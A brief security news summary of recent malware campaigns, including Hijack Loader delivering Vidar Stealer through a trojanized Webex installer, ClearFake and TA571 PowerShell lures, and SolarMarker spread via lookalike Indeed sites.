Emerging Threats: Hijack Loader, Vidar Stealer, and Evolving Malware Campaigns
Threat actors are using free or pirated versions of commercial software to deliver a malware loader called Hijack Loader, which then deploys the Vidar Stealer information stealer.
Researchers from Trellix have detailed a campaign where users are tricked into downloading password-protected archives containing a trojanized version of the Cisco Webex Meetings App. When executed, this application stealthily loads Hijack Loader, which ultimately deploys Vidar Stealer using DLL side-loading techniques.
The malware employs known methods to bypass User Account Control (UAC) and gain escalated privileges, adding itself to Windows Defender’s exclusion list to avoid detection. Alongside stealing credentials, the attack chain also deploys additional payloads like cryptocurrency miners.
This disclosure accompanies a rise in ClearFake campaigns, which trick users into executing PowerShell scripts under the guise of fixing web page issues, leading to the delivery of Lumma Stealer and other malware like Amadey Loader and XMRig miner. Similarly, malspam campaigns by TA571 use social engineering—emails with HTML attachments prompting users to run PowerShell commands or install MSI/VBS files, resulting in the deployment of Matanbuchus and DarkGate malware.
Proofpoint researchers note that these threats are complex to detect, given their reliance on user interaction and the execution of malicious code from the clipboard, making antivirus and EDR detection challenging.
Additionally, eSentire has identified a campaign using lookalike websites of Indeed[.]com to deliver SolarMarker malware through SEO poisoning, highlighting the risks of seemingly legitimate search results. This campaign emphasizes the need for caution when clicking on search engine results.
